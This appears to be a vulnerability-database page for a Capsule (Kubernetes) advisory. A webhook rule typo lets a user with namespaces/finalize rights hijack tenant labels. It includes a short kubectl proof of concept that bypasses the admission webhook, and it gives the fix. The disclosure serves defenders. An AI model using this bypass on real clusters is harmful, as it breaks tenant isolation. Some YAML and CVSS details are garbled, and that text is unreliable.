Capsule CVE-2026-55636
MEDIUMSeverity by source
AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:L
Non-admin namespaces/finalize RBAC suffices (PR:L), no victim interaction needed (UI:N), and impact is purely integrity - tenant label hijack with no confidentiality or availability consequence.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:L
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
Capsule v0.13.2 webhook rules contain namespace/finalize (singular) instead of namespaces/finalize (plural). K8s requires plural. The finalize defense from CVE-2026-30963 fix is absent.
Details
PUT to /api/v1/namespaces/<ns>/finalize has resource=namespaces (plural). The singular rule never matches. matchPolicy: Equivalent does not compensate.
PoC
Confirmed on kind + Capsule v0.13.2. alice (non-admin with namespaces/finalize RBAC): kubectl label --as=alice = DENIED (control). kubectl replace --raw /finalize --as=alice = 200 OK (bypass). Tenant label changed.
Impact
Namespace tenant-label hijack. Same threat model as CVE-2026-30963. One-char fix: namespace/finalize -> namespaces/finalize. The CVE-2026-30963 fix in Capsule v0.13.2 added subresource entries to the namespace validating webhook, but charts/capsule/templates/configuration.yaml line 105 contains a singular/plural typo: namespace/finalize instead of namespaces/finalize. Kubernetes webhook rules require the plural resource name. The finalize subresource defense is entirely absent.
Details
In Kubernetes admission webhooks, rules.resources matches against the plural resource name. A PUT to /api/v1/namespaces/<ns>/finalize has resource=namespaces (plural). The rule namespace/finalize (singular) never matches any real API request.
The matchPolicy: Equivalent setting does NOT compensate (it handles API group/version variations, not resource name typos).
PoC
Confirmed on kind cluster + Capsule v0.13.2 (Helm chart):
# Setup: alice with namespaces/finalize RBAC
kubectl apply -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: ns-finalize-updater
rules:
- apiGroups: [""]
- resources: ["namespaces/finalize"]
- verbs: ["update"]
- - apiGroups: [""]
- resources: ["namespaces"]
- verbs: ["get", "list"]
- EOF
- kubectl create clusterrolebinding alice-finalize --clusterrole=ns-finalize-updater --user=alice
# Control: normal label change DENIED
kubectl label namespace oil-prod capsule.clastix.io/tenant=evil --overwrite --as=alice
# Error: admission webhook denied
# Bypass: finalize changes tenant label (webhook NOT invoked)
kubectl get namespace oil-prod -o json > /tmp/ns.json
# modify tenant label to "hijacked"
kubectl replace --raw "/api/v1/namespaces/oil-prod/finalize" -f /tmp/ns_modified.json --as=alice
# 200 OK - tenant label changedImpact
Namespace tenant-label hijack via the finalize subresource bypass. Same threat model as CVE-2026-30963. One-character fix needed: namespace/finalize -> namespaces/finalize.
AnalysisAI
Namespace tenant-label hijack in Capsule v0.13.0-0.13.5 allows an authenticated Kubernetes user with namespaces/finalize RBAC permission to bypass the validating admission webhook and overwrite tenant isolation labels via the finalize subresource. The root cause is a one-character typo in the Helm chart configuration - namespace/finalize (singular) instead of namespaces/finalize (plural) - rendering the CVE-2026-30963 patch in v0.13.2 entirely ineffective. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The attacker must hold a Kubernetes RBAC permission explicitly granting update (or equivalent) on the namespaces/finalize subresource - either through a ClusterRole or Role binding. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS vector (AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:L) warrants scrutiny. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker operating as a Kubernetes user or service account with a legitimately or maliciously obtained ClusterRole granting update on namespaces/finalize issues a kubectl replace --raw /api/v1/namespaces/oil-prod/finalize request with a modified namespace JSON containing an altered capsule.clastix.io/tenant label. Because the Capsule webhook rule misspells the resource as namespace/finalize (singular), the API server never invokes the webhook, and the finalize PUT succeeds with HTTP 200, reclassifying the namespace under an attacker-controlled tenant. … |
| Remediation | Upgrade Capsule to version 0.13.6 via Helm chart update, which corrects the singular/plural typo to `namespaces/finalize` in charts/capsule/templates/configuration.yaml line 105. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Kubernetes
View allA critical vulnerability in Kubernetes ingress-nginx controller allows unauthenticated attackers with pod network access
Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio
Kubernetes ingress-nginx contains a configuration injection vulnerability via the mirror-target and mirror-host Ingress
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-url` Ingres
A security issue was discovered in ingress-nginx https://github.com/kubernetes/ingress-nginx where the `auth-tls-match-c
Kubernetes API server in all versions allow an attacker who is able to create a ClusterIP service and set the spec.exter
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Rated critical severity (CVSS 9.9), this vulne
The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4
Kyverno Kubernetes policy engine prior to 1.x has a privilege escalation vulnerability (CVSS 9.9) allowing policy bypass
Kamaji is the Hosted Control Plane Manager for Kubernetes. Rated critical severity (CVSS 9.9), this vulnerability is rem
Jumpserver is a popular open source bastion host, and Koko is a Jumpserver component that is the Go version of coco, ref
String filter bypass in Inspektor Gadget Kubernetes eBPF tooling before fix. Insufficient string escaping enables filter
Same weakness CWE-863 – Incorrect Authorization
View allSame technique Authentication Bypass
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-gwxr-7h77-7777